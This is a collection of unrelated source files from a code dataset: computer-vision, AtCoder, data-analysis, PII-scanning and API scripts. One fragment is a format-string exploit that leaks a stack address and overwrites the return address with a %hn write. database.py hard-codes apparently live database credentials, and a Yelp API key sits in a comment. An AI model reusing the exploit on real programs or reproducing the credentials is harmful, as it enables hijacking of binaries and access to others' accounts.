start = time.time()
#loop over the image pyramid
for image in pyramid:
    #determine scale factor b/w original image dimensions and current layer of pyramid
    scale = W / float(image.shape[1])
    #for each layer of pyramid loop over sliding window locations
    for (x, y, roiOrig) in sliding_window(image, WIN_STEP, ROI_SIZE):
        #scale (x, y) coordinates of ROI w.r.t original image dimension
        x = int(x * scale)
        y = int(y * scale)
        w = int(ROI_SIZE[0] * scale)
        h = int(ROI_SIZE[1] * scale)
        #take ROI and preprocess it so we can later classify it using keras/Tensorflow
        roi = cv2.resize(roiOrig, INPUT_SIZE)
        roi = img_to_array(roi)
        roi = preprocess_input(roi)
        #update list of ROIs and associated coordinates
        rois.append(roi)
        locs.append((x, y, x + w, y + h))
        #check to see if we are visualizing each of sliding windows in pyramid
        if args['visualize'] > 0:
            #clone original image and draw a bounding box surrounding current region
            clone = orig.copy()
            cv2.rectangle(clone, (x, y), (x + w, y + h), (0, 255, 0), 2)
            #show visualization and current ROI
            cv2.imshow('visualization', clone)
            cv2.imshow('ROI', roiOrig)
            cv2.waitKey(0)
#show how long it took to loop over the image pyramid layers and sliding window location
end = time.time()
print('Looping over Pyramid/Window took {:.5f} seconds'.format(end-start))
#convert the ROIs to a numpy array so they can be classified in one batch
rois = np.array(rois, dtype = 'float32')
#classify ROIs using ResNet and show time duration of classification
print('Classifying ROIs...')
start = time.time()
preds = model.predict(rois)
end = time.time()
print('Classifying ROIs took {:.5f} seconds'.format(end - start))
#decode the predictions and initialize a dictionary which maps class labels
#to any ROIs with that label
preds = imagenet_utils.decode_predictions(preds, top = 1)
labels = {}
print('Preds')
print(preds[0])
#loop over the predictions (one top-1 prediction per ROI)
for (i, p) in enumerate(preds):
    #grab prediction information of current ROI
    (imagenetID, label, prob) = p[0]
    #filter out weak detections by ensuring the predicted probability is greater than
    #min probability (argparse maps --min-conf to the 'min_conf' key)
    if prob >= args['min_conf']:
        #grab bounding box associated with prediction and convert coordinates
        box = locs[i]
        #grab list of predictions for label and add bounding box and probability to list
        L = labels.get(label, [])
        L.append((box, prob))
        labels[label] = L
#loop over the labels for each of detected objects in image
for label in labels.keys():
    #clone the original image so we can draw on it
    print('Showing results for "{}" '.format(label))
    clone = orig.copy()
    #loop over all bounding boxes for current label
    for (box, prob) in labels[label]:
        #draw bounding box on image
        (startX, startY, endX, endY) = box
        cv2.rectangle(clone, (startX, startY), (endX, endY), (0, 255, 0), 2)
    #show results before applying non-maxima suppression, then clone image again and show
    #after applying non-maxima suppression
    cv2.imshow('Before', clone)
    clone = orig.copy()
    #extract bounding boxes and associated prediction probabilities and apply
    #non-maxima suppression
    boxes = np.array([p[0] for p in labels[label]])
    proba = np.array([p[1] for p in labels[label]])
    boxes = non_max_suppression(boxes, proba)
    #loop over all bounding boxes that were kept after applying non-max suppression
    for (startX, startY, endX, endY) in boxes:
        #draw bounding box and label on image
        cv2.rectangle(clone, (startX, startY), (endX, endY), (0, 255, 0), 2)
        # place the label above the box unless that would fall off the image
        y = startY-10 if startY-10>10 else startY+10
        cv2.putText(clone, label, (startX, y), cv2.FONT_HERSHEY_SIMPLEX, 0.45, (0, 255, 0), 2)
    #show output after applying non-maxima suppression
    cv2.imshow('After', clone)
    cv2.waitKey(0)
def main():
    """Compress the coordinates in the global AB to 1-based ranks and print them."""
    row_rank = {value: rank
                for rank, value in enumerate(sorted({ai for ai, _ in AB}), start=1)}
    col_rank = {value: rank
                for rank, value in enumerate(sorted({bi for _, bi in AB}), start=1)}
    for ai, bi in AB:
        print(row_rank[ai], col_rank[bi])
if __name__ == '__main__':
    # Read grid dimensions and point count (H and W are read but unused by main),
    # then the N coordinate pairs.
    H, W, N = map(int, input().split())
    AB = [list(map(int, input().split())) for _ in range(N)]
    main()
| Shirohi-git/AtCoder | abc211-/abc213_c.py | abc213_c.py | py | 398 | python | en | code | 2 | github-code | 13 |
13960225778 | from sqlalchemy import create_engine, text
# SECURITY NOTE(review): a live-looking database username/password is
# hard-coded here. Credentials committed to source should be rotated and
# loaded from the environment (e.g. os.environ) instead.
db_connection_string = "mysql+pymysql://2tbapi8bc3m9cvx8pnww:pscale_pw_10YnHMfHSznFMKXdkv2uL0FzkGIzEKh9Dx9hyjKJmol@aws.connect.psdb.cloud/sdn_test01?charset=utf8mb4"
# PlanetScale requires TLS; point the driver at the system CA bundle.
engine = create_engine(db_connection_string,
                       connect_args={"ssl": {
                           "ssl_ca": "/etc/ssl/cert.pem"
                       }})
def load_jobs_from_db():
    """Fetch every row of the ``jobs`` table as a list of plain dicts."""
    with engine.connect() as conn:
        rows = conn.execute(text("select * from jobs"))
        return [dict(row) for row in rows.all()]
| Thipekesh28/SDN_TESTCASE_01 | database.py | database.py | py | 586 | python | en | code | 0 | github-code | 13 |
23111651618 | from src.parsing.DataReader import DataReader
import os
import pickle
import datetime
PRECIPITATION_THRESHOLD = 1.25 # inches of precipitation
def compute_monthly_deviation():
    """For each month, compare average daily sales on heavy-precipitation days
    against the month's overall daily average and print the percent effect.

    Reads pickled weather data and the sales CSV from the data/ directory.
    """
    # Load weather data
    weather_pickle_path = os.path.join('data', 'serialized', 'weather_data_by_day.pkl')
    weather_data = load_weather_data_from_pickle(weather_pickle_path)
    precipitation_effects = []
    # dict of {datetime.date() : (temp, precip) }
    # only includes date where business was open
    # Load sales data
    reader = DataReader(os.path.join('data', 'dataSet.csv'))
    sales_per_month = get_sales_by_month(reader)
    sales_by_date = reader.get_sales_by_day()
    print(sales_per_month)
    # Process each month
    for i in range(1, 13):
        current_month: int = i
        # NOTE(review): avg_temp is computed but never used.
        avg_temp = calculate_avg_temp_for_month(current_month, weather_data)
        avg_sales_on_normal_day = sales_per_month[current_month - 1]
        # Days of this month whose precipitation exceeds the threshold.
        days_precipitated_in_current_month = [date for date in weather_data.keys()
                                              if date.month == current_month
                                              and weather_data[date][1] > PRECIPITATION_THRESHOLD]
        print(days_precipitated_in_current_month)
        average_sales_on_precip_days = calculate_sales_on_precip_days(days_precipitated_in_current_month, sales_by_date)
        if average_sales_on_precip_days is None:
            print(f"No precipitated days for month {current_month}.")
            continue
        print(f"Average sales on normal day: {avg_sales_on_normal_day}")
        print(f"Average sales on precip day: {average_sales_on_precip_days}")
        # Percent change of precip-day sales relative to the monthly average.
        precip_effect = average_sales_on_precip_days / avg_sales_on_normal_day
        precip_effect -= 1
        precip_effect *= 100
        print(f"Precip Affect for {current_month}: {precip_effect:.2f}%")
        precipitation_effects.append(precip_effect)
    print(precipitation_effects)
    avg_precip_effect = calculate_avg_precip_effect(precipitation_effects)
    print(f"Avg precip effect: {avg_precip_effect}")
def calculate_avg_precip_effect(effects: list):
    """Return the mean absolute value of *effects*.

    Raises ZeroDivisionError when *effects* is empty (same as the original).
    """
    return sum(abs(effect) for effect in effects) / len(effects)
def calculate_sales_on_precip_days(days_precipitated: list, sales_by_date: dict) -> float:
    """Average daily sales over *days_precipitated*.

    Days missing from *sales_by_date* contribute zero but still count in the
    divisor. Returns None when the day list is empty.
    """
    if not days_precipitated:
        return None
    total_sales = sum(sales_by_date.get(day, 0) for day in days_precipitated)
    return total_sales / len(days_precipitated)
def get_sales_by_month(reader: DataReader) -> list:
    """Return average daily sales for months 1..12 (index 0 = January).

    Results are cached as a pickle under data/serialized/; the cache is
    loaded when present, otherwise computed from *reader* and written.
    """
    sales_per_month = []
    path = os.path.join("data", "serialized", "avg_sales_per_month.pkl")
    if os.path.exists(path):
        # Cache hit: trust the previously pickled list.
        with open(path, "rb") as f:
            sales_per_month = pickle.load(f)
        return sales_per_month
    else:
        for current_month in range(1, 13):
            avg_sales_in_in_month = reader.get_avg_sales_per_day_in_month(current_month)
            sales_per_month.append(avg_sales_in_in_month)
        # NOTE(review): assumes the data/serialized directory already exists.
        with open(path, 'wb') as f:
            pickle.dump(sales_per_month, f)
        return sales_per_month
def calculate_avg_temp_for_month(month: int, weather_data: dict):
    """Return the mean temperature for *month*, or None when the month has no
    entries in *weather_data* (a ``{date: (temp, precip)}`` mapping)."""
    temps = [entry[0] for day, entry in weather_data.items() if day.month == month]
    if not temps:
        return None
    return sum(temps) / len(temps)
def load_weather_data_from_pickle(weather_pickle_path: str):
    """Load the pickled weather mapping from *weather_pickle_path*.

    Raises FileNotFoundError when the file is missing; returns None when the
    file exists but cannot be unpickled.
    """
    if not os.path.exists(weather_pickle_path):
        print(f"File does not exist: {weather_pickle_path}")
        raise FileNotFoundError
    try:
        with open(weather_pickle_path, 'rb') as f:
            return pickle.load(f)
    except (pickle.UnpicklingError, EOFError) as e:
        print(f"Error while reading the pickle file: {str(e)}")
        return None
# Script entry point: run the full monthly-deviation analysis.
if __name__ == "__main__":
    compute_monthly_deviation()
| ReeseHatfield/DataDynamics | src/weather_analysis/computation/compute_monthly_deviation.py | compute_monthly_deviation.py | py | 4,166 | python | en | code | 0 | github-code | 13 |
27188594093 | import sys
# Faster input for competitive programming, then read A, B, C from one line.
input = sys.stdin.readline
A, B, C = map(int, input().split())
def find(A, B, C):
    """Return (A ** B) % C.

    Rewritten to use the built-in three-argument pow(), which performs
    modular exponentiation in O(log B) exactly like the original recursive
    squaring, and additionally handles B == 0 (the original recursed
    forever in that case).
    """
    return pow(A, B, C)
print(find(A, B, C)) | Nam4o/Algorithm | 백준/Silver/1629. 곱셈/곱셈.py | 곱셈.py | py | 307 | python | en | code | 1 | github-code | 13 |
43261653442 | from heapq import heappop, heappush
def weighted_nearlist(N):
    """Build per-vertex adjacency sets of (neighbor, weight) pairs.

    Reads the global edge list ``abc`` (1-based endpoints) and the global
    vertex count ``n``; parallel edges keep the smallest weight, and
    zero/negative weights are dropped.
    """
    weight = [[-1] * N for _ in range(N)]
    for src, dst, cost in abc:
        current = weight[src - 1][dst - 1]
        if current > cost or current < 0:
            weight[src - 1][dst - 1] = cost
    adjacency = [set() for _ in range(N)]
    for u in range(n):
        for v in range(n):
            if weight[u][v] > 0:
                adjacency[u].add((v, weight[u][v]))
    return adjacency
def dijkstra(S, N):
    """Single-source shortest distances from S over the global ``near``
    adjacency list; unreachable vertices keep the -1 sentinel."""
    DIST = [-1] * N
    DIST[S] = 0
    que = [(DIST[S], S)]
    while que:
        d, q = heappop(que)
        # Skip stale heap entries superseded by a shorter path.
        if DIST[q] < d:
            continue
        for i, d_qi in near[q]:
            tmp = d + d_qi
            # Relax when i is still unvisited (-1) or a shorter path is found.
            if DIST[i] > tmp or DIST[i] < 0:
                DIST[i] = tmp
                heappush(que, (tmp, i))
    return DIST
# Read the graph: n vertices, m weighted directed edges.
n, m = map(int, input().split())
abc = [list(map(int, input().split())) for _ in range(m)]
near = weighted_nearlist(n)
# All-pairs shortest distances via one Dijkstra run per source.
dist = [dijkstra(i, n) for i in range(n)]
# For each vertex i, print the length of the shortest cycle through i
# (-1 when no cycle exists).
for i in range(n):
    ans = -1
    # A self-loop on i is itself a cycle of length c: starting from the -1
    # sentinel, ans becomes c when (i, c) is in i's own adjacency set.
    for (j, c) in near[i]:
        ans += (c + 1) * (j == i)
    for j in range(n):
        s, t = dist[i][j], dist[j][i]
        # Cycle through i via j: i->j plus j->i, both legs reachable.
        if (s > 0 and t > 0) and (ans < 0 or s + t < ans):
            ans = s + t
    print(ans)
| Shirohi-git/AtCoder | abc191-/abc191_e.py | abc191_e.py | py | 1,176 | python | en | code | 2 | github-code | 13 |
10160033295 | import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
def _count_fast_normal_collisions(df_subset, velocity_threshold=8):
    """Count collisions in *df_subset* where the faster vehicle is NOT an SDC
    and its speed exceeds *velocity_threshold*.

    Each ``datos_choques`` cell holds a serialized list of collision records
    (speed/type fields at indices 1, 2, 4, 6).
    """
    count = 0
    for idx in df_subset.index:
        # NOTE(review): eval() on CSV cell contents executes arbitrary code if
        # the data file is untrusted; ast.literal_eval would be safer -- confirm
        # the cells are plain list literals before switching.
        for choque in eval(df_subset["datos_choques"][idx]):
            max_velocity = max(choque[4], choque[1])
            if max_velocity > velocity_threshold:
                if (choque[2] != "SDC" and choque[1] == max_velocity) \
                        or (choque[6] != "SDC" and choque[4] == max_velocity):
                    count += 1
    return count


df = pd.read_csv("data_tiempo.csv")

# One subset per entry probability; the three hand-duplicated counting loops
# of the original are now a single helper call each (commented-out SDC
# counting code removed).
# NOTE(review): the plot labels below say 'No SDC', 'SDC 0.3', 'SDC 0.8' but
# the subsets filter prob_entrar == 0.2 / 0.4 / 0.6 -- confirm which naming
# is intended.
df_00 = df[df['prob_entrar'] == 0.2]
mean_choque_normal_00 = _count_fast_normal_collisions(df_00) / df_00.shape[0]

df_03 = df[df['prob_entrar'] == 0.4]
mean_choque_normal_03 = _count_fast_normal_collisions(df_03) / df_03.shape[0]

df_08 = df[df['prob_entrar'] == 0.6]
mean_choque_normal_08 = _count_fast_normal_collisions(df_08) / df_08.shape[0]

# Bar chart of the mean collision counts.
labels = ['No SDC', 'SDC 0.3', 'SDC 0.8']
collision_counts_normal = [mean_choque_normal_00, mean_choque_normal_03, mean_choque_normal_08]

# Positions and width of the bars.
x = range(len(labels))
width = 0.35

fig, ax = plt.subplots(figsize=(10, 6))
rects1 = ax.bar(x, collision_counts_normal, width, label='Normal')

# Axis labels, title, and custom x-axis tick labels.
ax.set_ylabel('Number of Collisions')
ax.set_title('Mean Number of Collisions in 3 Hours with Density 40%')
ax.set_xticks([p + width/2 for p in x])
ax.set_xticklabels(labels)
ax.legend()

def add_labels(rects):
    """Annotate each bar with its height (uses the enclosing ``ax``)."""
    for rect in rects:
        height = rect.get_height()
        ax.annotate(f'{height}', xy=(rect.get_x() + rect.get_width() / 2, height),
                    xytext=(0, 3), textcoords='offset points',
                    ha='center', va='bottom')

add_labels(rects1)
plt.text(0.5, 0.9, 'The colllisions shown happen at velocity > 8', horizontalalignment='center', fontsize=10, transform=ax.transAxes)
plt.savefig('mean_choques_plot_normal.png', dpi=300, bbox_inches='tight')
plt.tight_layout()
plt.show()
| Bony2002/TP_APN | plots/plot_2.py | plot_2.py | py | 3,743 | python | en | code | 0 | github-code | 13 |
34766394040 | import logging
import re
from abc import ABC
from piicatcher.log_mixin import LogMixin
from piicatcher.scanner import ColumnNameScanner, NERScanner, RegexScanner
from piicatcher.piitypes import PiiCategories
class NamedObject(ABC, LogMixin):
    """Base class for named database objects (databases, schemas, tables,
    columns).

    Tracks the PII types detected on the object, its child objects, and the
    optional include/exclude regexes that filter which children are visited.
    """

    def __init__(self, name, include, exclude):
        self._name = name
        self._pii = set()
        self._children = []
        self._include_regex = ()
        self._exclude_regex = ()
        self.set_include_regex(include)
        self.set_exclude_regex(exclude)
        self.logger.debug(
            "Name: %s, include: (%s), exclude: (%s)",
            name,
            ",".join(include),
            ",".join(exclude),
        )

    def get_name(self):
        """Return the object's name."""
        return self._name

    def has_pii(self):
        """Return True when any PII type has been recorded on this object."""
        # Consistency fix: use the instance logger like every other method
        # (was the root ``logging`` module).
        self.logger.debug("has_pii {} has {}".format(self, self._pii))
        return bool(self._pii)

    def _has_category(self, category):
        """Return True when any recorded (category, type) tuple matches *category*."""
        return any(pii[0] == category for pii in self._pii)

    def has_customer_data(self):
        return self._has_category(PiiCategories.CUSTOMER_DATA)

    def has_customer_usage_data(self):
        return self._has_category(PiiCategories.CUSTOMER_USAGE_DATA)

    def has_authentication_data(self):
        return self._has_category(PiiCategories.AUTHENTICATION_DATA)

    def get_pii_types(self):
        """Return the set of recorded PII tuples."""
        return self._pii

    def get_pii_types_str(self):
        """Return the recorded PII types as a comma-separated string."""
        return ",".join(str(x) for x in self._pii)

    def get_children(self):
        """Return children filtered by the include/exclude regexes.

        A child survives when it matches at least one include regex (if any
        were configured) and matches no exclude regex.
        """
        matches = self._children
        if len(self._include_regex) > 0:
            # Rewritten from a set-union of filter() calls: keeps the original
            # child insertion order deterministic instead of depending on set
            # iteration order.
            matches = [
                child
                for child in self._children
                if any(r.search(child.get_name()) is not None
                       for r in self._include_regex)
            ]
        for regex in self._exclude_regex:
            matches = [m for m in matches if regex.search(m.get_name()) is None]
        return matches

    def add_child(self, child):
        """Register a child object."""
        self._children.append(child)

    def set_include_regex(self, include):
        self._include_regex = [re.compile(exp, re.IGNORECASE) for exp in include]

    def set_exclude_regex(self, exclude):
        self._exclude_regex = [re.compile(exp, re.IGNORECASE) for exp in exclude]

    def scan(self, generator):
        """Recursively scan children with *generator*, collecting their PII."""
        self.logger.debug("Scanning %s" % self.get_name())
        for child in self.get_children():
            child.scan(generator)
            self.logger.debug(
                "{} has {}".format(child.get_name(), child.get_pii_types())
            )
            # set.update replaces the original list-comprehension-for-side-effect.
            self._pii.update(child.get_pii_types())
        self.logger.debug("%s has %s", self.get_name(), self.get_pii_types_str())

    def shallow_scan(self):
        """Scan children by name only (no data access), collecting their PII."""
        self.logger.debug("Scanning %s" % self.get_name())
        for child in self.get_children():
            child.shallow_scan()
            self._pii.update(child.get_pii_types())
        self.logger.debug("%s has %s", self.get_name(), self.get_pii_types_str())
class Database(NamedObject):
    """A named database; children (added via add_child) are schemas."""
    def __init__(self, name, include=(), exclude=()):
        super(Database, self).__init__(name, include, exclude)
class Schema(NamedObject):
    """A named schema; children are tables."""
    def __init__(self, name, include=(), exclude=()):
        super(Schema, self).__init__(name, include, exclude)
    def get_dict(self):
        """Serialize the schema and its (filtered) tables to a plain dict."""
        return {
            "has_pii": self.has_pii(),
            "name": self._name,
            "tables": [table.get_dict() for table in self.get_children()],
        }
class Table(NamedObject):
    """A named table; children are columns.

    ``scan`` pulls sample rows from a data generator and runs data scanners
    over every column value.
    """
    def __init__(self, schema, name):
        super(Table, self).__init__(name, (), ())
        # Parent schema, needed by the row generator.
        self._schema = schema
    def scan(self, generator):
        """Scan sampled rows of this table for PII.

        *generator* yields rows for the given columns; each value is passed
        through the regex and NER scanners, then column-level PII is rolled
        up onto the table.
        """
        self.logger.debug("Scanning table name %s" % self.get_name())
        scanners = [RegexScanner(), NERScanner()]
        for row in generator(
            column_list=self.get_children(), schema_name=self._schema, table_name=self
        ):
            # Rows are positionally aligned with the (filtered) column list.
            for col, val in zip(self.get_children(), row):
                col.scan(val, scanners)
        # Roll every column's detected PII up to the table level.
        for col in self.get_children():
            [self._pii.add(p) for p in col.get_pii_types()]
        self.logger.debug("%s has %s", self.get_name(), self.get_pii_types_str())
    def get_dict(self):
        """Serialize the table and its columns to a plain dict."""
        dictionary = {"has_pii": self.has_pii(), "name": self.get_name(), "columns": []}
        for col in self.get_children():
            dictionary["columns"].append(col.get_dict())
        return dictionary
class Column(NamedObject):
    """A named column; the leaf object of the hierarchy.

    PII is detected both from sampled data values (via the scanners passed
    to ``scan``) and from the column name itself.
    """
    def __init__(self, name):
        super(Column, self).__init__(name, (), ())
        # Name-based scanner used by shallow_scan.
        self.column_scanner = ColumnNameScanner()
    def add_pii_type(self, pii):
        """Record a PII type on this column directly."""
        self._pii.add(pii)
    def scan(self, data, scanners):
        """Run every data scanner over *data* (skipped when None), then also
        scan the column name."""
        self.logger.debug("Scanning column name %s" % self.get_name())
        if data is not None:
            for scanner in scanners:
                [self._pii.add(pii) for pii in scanner.scan(data)]
            self.logger.debug("%s has %s", self.get_name(), self.get_pii_types_str())
        self.shallow_scan()
    def shallow_scan(self):
        """Detect PII from the column name alone (no data access)."""
        self.logger.debug("Scanning column name %s" % self.get_name())
        [self._pii.add(pii) for pii in self.column_scanner.scan(self.get_name())]
    def get_dict(self):
        """Serialize the column's name and detected PII types."""
        return {"pii_types": list(self.get_pii_types()), "name": self.get_name()}
| dm03514/piicatcher | piicatcher/explorer/metadata.py | metadata.py | py | 5,610 | python | en | code | null | github-code | 13 |
18659411184 | import boto3
import json
import yelp_fusion_api
import datetime
# SECURITY NOTE(review): the commented-out line below contains what appears to
# be a real Yelp API key; it should be revoked and never committed to source.
#api_key="-5dBnE7ZnbVw1RshcBve1t-Ayg00nnw4PEMj-in726bQM4jODmHTgdUKIEQXzKKgq4hrainJdwniItyA5tZOFg71e9yrEDuqa-tDoxlPpxxzFtQ20Jlr6AcSXRDlW3Yx"
# Yelp Fusion API host and business-search endpoint.
API_HOST = 'https://api.yelp.com'
SEARCH_PATH = '/v3/businesses/search'
# Example of the `details` dict expected by get_info_yelp:
#details = {"area": "Manhattan", "time": "8:30", "dining": "dinner", "cuisine": "Indian", "date": "2018-11-09"}
def time_convert(time, date):
    """Convert 'H:MM' and 'YYYY-MM-DD' strings into an integer UTC Unix timestamp."""
    year, month, day = (int(part) for part in date.split("-"))
    hours, minutes = (int(part) for part in time.split(":"))
    moment = datetime.datetime(year, month, day, hours, minutes,
                               tzinfo=datetime.timezone.utc)
    return int(moment.timestamp())
def get_info_yelp(details, api_key):
    """Query the Yelp business-search API and return up to five matches.

    *details* must contain 'area', 'time', 'dining', 'cuisine' and 'date'
    keys; each returned dict has restaurant_name/rating/price/phone/address,
    with "NA" for any missing field.
    """
    area = details['area']
    time = details['time']
    dining = details['dining']
    cuisine = details['cuisine']
    date = details['date']
    print("The date is "+str(date))
    categories = dining+","+cuisine
    # Yelp expects opening time as a Unix timestamp.
    converted_time = time_convert(time, date)
    print("The converted_time is "+str(converted_time))
    url_params = {
        'term': cuisine.replace(' ', '+'),
        'categories': categories.replace(' ', '+'),
        'location': area.replace(' ', '+'),
        'open_at': converted_time,
        'limit': 5
    }
    resp2 = yelp_fusion_api.request(API_HOST, SEARCH_PATH, api_key, url_params)
    print("The Response from yelp is "+str(resp2))
    # logger.info("The Response from yelp is "+str(resp2))
    yelp_data_array = []
    # Flatten each business record, defaulting every field to "NA".
    for i in resp2['businesses']:
        name,price,rating,phone_number,address = "NA","NA","NA","NA","NA"
        if 'name' in i:
            name = i['name']
        if 'price' in i:
            price = i['price']
        if 'rating' in i:
            rating = i['rating']
        if 'display_phone' in i :
            phone_number = i['display_phone']
        if 'location' in i:
            if 'display_address' in i['location']:
                address = ''.join(str(e) for e in i['location']['display_address'])
        data = {
            "restaurant_name" : name,
            "rating" : str(rating),
            "price" : price,
            "phone" : phone_number,
            "address" : address
        }
        yelp_data_array.append(data)
    print("The final yelp data array "+str(yelp_data_array))
    return yelp_data_array
| dhruvarora2/Yelper | Backend/aws lambdas/vYelper-sqs_Handler/yelp_handler.py | yelp_handler.py | py | 2,386 | python | en | code | 0 | github-code | 13 |
6343660440 | import bs4
import requests
def getip():
    """Fetch this machine's external IP address from https://2ip.ua/ua/.

    Returns the scraped address string, or None when any step fails.
    """
    try:
        response = requests.get('https://2ip.ua/ua/')
        parsed = bs4.BeautifulSoup(response.text, "html.parser")
        # NOTE(review): " Ваша IP адреса" is not a valid CSS selector, so this
        # select() call very likely fails -- confirm the correct selector
        # against the live 2ip.ua markup.
        address = parsed.select(" Ваша IP адреса")[0].getText().strip()
        print(address)
    except Exception as exc:
        # Replaces the bare ``except`` and the manual ``step`` progress
        # counter with a report of the actual failure.
        print('Ошибка определения адреса.....' + str(exc))
        return None
    # BUG FIX: the original unconditionally overwrote the scraped value with
    # '0.0.0.0' before returning, and had an unreachable print() after the
    # return statement.
    return address


getip()
18145777119 |
# Format-string exploit script. NOTE(review): start(), p64(), and the pwntools
# helpers presumably come from the standard pwntools exploit template imported
# elsewhere in this project.
io = start()
# Leak a stack value (positional argument 198) as a pointer via %p.
exploit = f"%198$p"
io.sendline(exploit)
io.recvuntil(b"Your input is:")
io.recvline()
leaked_rbp = io.recvline(keepends=False)
# NOTE(review): the -72 offset presumably rebases the leaked saved-RBP value
# onto the saved-return-address slot -- binary specific, confirm in a debugger.
rip= int(leaked_rbp, 16)-72
# %n write: print 58038 padded bytes, then write that count as a half-word
# through pointer argument 83; the target address follows the format string.
buf=b"%058038d%83$hn"+p64(rip)
io.sendline(buf)
33759115361 | """Helpful functions for de-wedging research."""
import itertools
import logging
import os
import numpy as np
from astropy import constants
def get_coverage(antpos, freqs, bin_edges=None, mode="u"):
    """
    Determine the number of baselines that sample each mode.
    Unless bin edges for an array of u(vw)-modes is provided, this will count
    integer u(vw)-modes that are sampled by the array.
    Parameters
    ----------
    antpos: dict
        Dictionary mapping antenna numbers to ENU baselines in meters.
    freqs: array-like of float
        Array of frequencies in GHz.
    bin_edges: array-like of float or dict, optional
        Bin edges corresponding to gridding of the uvw coordinate system. If
        passing a dictionary, keys should come from the set {'u', 'v', 'w'},
        and values should be arrays of floats specifying bin edges.
        Default is to use unity-length bins, centered on integer values.
    mode: str, optional
        Whether to bin in u, v, w, or some combination of the three. Default
        is to bin in u.
    Returns
    -------
    coverage: dict
        Dictionary mapping mode (one of 'u', 'v', 'w') to counts per bin. Keys
        are the characters in the ``mode`` string, values are the counts per bin
        for each mode.
    bin_edges: dict
        Dictionary mapping mode to bin edges used for that mode.
    Notes
    -----
    This function counts the number of baselines that sample particular modes
    in the uvw-coordinate system in a way that treats u, v, and w independently.
    A more careful treatment is needed to count the number of times a given uvw
    mode is sampled (i.e. using something like np.histogramdd).
    """
    # Make sure bin edges are broadcastable to modes for which to get coverage.
    uvw_to_ind = dict(zip('uvw', range(3)))
    baselines = get_baselines(antpos)
    if bin_edges is not None:
        if not isinstance(bin_edges, dict):
            try:
                # BUG FIX: ``np.float`` was removed in NumPy 1.24; use the
                # builtin ``float``, which is what the alias always meant.
                bin_edges = np.array(bin_edges).astype(float)
                if bin_edges.ndim not in (1, 2): raise ValueError
            except ValueError:
                raise ValueError("Bin edges could not be parsed.")
            if bin_edges.ndim == 2:
                if bin_edges.shape[0] != len(mode):
                    raise ValueError(
                        "2-D arrays of bin edges must have the same number "
                        "of rows as modes specified. You provided bin edges "
                        f"with shape {bin_edges.shape}, but want to calculate "
                        f"coverage for {len(mode)} modes ({set(mode)})."
                    )
                bin_edges = dict(zip(mode, bin_edges))
            else:
                # We won't be modifying the bin edges, so this is safe.
                bin_edges = dict.fromkeys(mode, bin_edges)
        else:
            if set(bin_edges.keys()) != set(mode):
                raise ValueError("bin_edges keys do not match provided modes.")
    else:
        # No edges given: derive integer-centered bins spanning the full range
        # of each requested mode across all baselines and frequencies.
        mode_bounds = {
            m: (
                min(bl[uvw_to_ind[m]] for bl in baselines.values()),
                max(bl[uvw_to_ind[m]] for bl in baselines.values())
            )
            for m in mode
        }
        for m, bounds in mode_bounds.items():
            # Negative coordinates scale "outward" with the opposite frequency
            # extreme, hence the sign checks.
            if bounds[0] < 0:
                lower_bound = bounds[0] * freqs.max()
            else:
                lower_bound = bounds[0] * freqs.min()
            if bounds[1] < 0:
                upper_bound = bounds[1] * freqs.min()
            else:
                upper_bound = bounds[1] * freqs.max()
            mode_bounds[m] = (
                int(np.floor(lower_bound)) - 1,
                int(np.ceil(upper_bound)) + 1
            )
        # Ensure bin centers are integers from lower_bound to higher_bound.
        bin_edges = {m: np.arange(*bounds) + 0.5 for m, bounds in mode_bounds.items()}
    coverage = {m: np.zeros(len(bins) - 1) for m, bins in bin_edges.items()}
    for bl in baselines.values():
        for m, bins in bin_edges.items():
            hist = np.histogram(freqs * bl[uvw_to_ind[m]], bins=bins)[0]
            # Each baseline can only count once, so don't overcount.
            hist = np.min(np.vstack([np.ones(hist.size), hist]), axis=0)
            coverage[m] += hist
    return coverage, bin_edges


def get_baselines(antpos, autos=False):
    """Construct dictionary mapping antenna pairs to baselines."""
    if autos:
        combinations = itertools.combinations_with_replacement
    else:
        combinations = itertools.combinations
    return {
        pair: np.array(antpos[pair[1]]) - np.array(antpos[pair[0]])
        for pair in combinations(antpos.keys(), 2)
    }
def save_file(filename, clobber):
    """Decide whether *filename* should be written.

    Returns True for a new file, True for an existing file when *clobber* is
    set (logged), and False otherwise (logged).
    """
    if os.path.exists(filename):
        if clobber:
            logging.info("File exists; clobbering.")
            return True
        logging.info("File exists; skipping.")
        return False
    return True
| HERA-Team/hera_sandbox | rfp/scripts/dewedge/utils.py | utils.py | py | 5,062 | python | en | code | 1 | github-code | 13 |
28892475070 | from batchrunner import BatchRunnerMP
from model import BeeEvolutionModel
from agents import *
import argparse
import pickle
def main():
    """
    Run the model for the global sensitivity analysis, using the data file
    variable_parameters.pickle, which holds the parameter sets produced by
    Saltelli sampling. The random seed is supplied via --seed on the command
    line; collected model data is pickled to results/data_<seed>.pickle.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('--seed', required=True, help='Enter your random seed.')
    args = parser.parse_args()
    seed = int(args.seed)
    # Set the repetitions
    replicates = 1
    # load preset saltelli sample of parameters
    with open("variable_parameters.pickle", "rb") as f:
        variable_parameters = pickle.load(f)
    batch = BatchRunnerMP(BeeEvolutionModel,
                          fixed_parameters={"seed":seed},
                          iterations=replicates,
                          variable_parameters=variable_parameters,
                          display_progress=True)
    batch.run_all()
    # collection of the data
    data = batch.get_collector_model()
    # NOTE(review): assumes the results/ directory already exists.
    with open(f"results/data_{seed}.pickle", 'wb') as f:
        pickle.dump(data, f)
# Run the batch sensitivity analysis when executed as a script.
if __name__ == "__main__":
    main()
| AnkurSatya/uva_abm_bumblebee | bumblebee_evolution/batch_run.py | batch_run.py | py | 1,140 | python | en | code | 1 | github-code | 13 |
808942212 | """Trains and evaluates a given model.
Also constructs Kaggle submissions, and save various plots (e.g. confusion
matrix, learning curve) and pickled models to files with a unique id.
"""
import argparse
import numpy as np
import pandas as pd
from keras.utils import to_categorical
import matplotlib.pyplot as plt
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import accuracy_score, log_loss
# from helpers import log_loss
from sklearn.model_selection import cross_val_score, train_test_split, \
StratifiedKFold
from sklearn.neighbors import KNeighborsClassifier
from sklearn.svm import LinearSVC
from sklearn.preprocessing import MinMaxScaler
from sklearn.calibration import CalibratedClassifierCV
from xgboost import XGBClassifier
import pickle
from helpers import compute_AUC_scores, construct_kaggle_submissions, \
plot_confusion_matrix
# Command-line options: model choice plus preprocessing/training switches.
parser = argparse.ArgumentParser()
parser.add_argument("--model", "-m", type=str, default="XGBoost", help="Model")
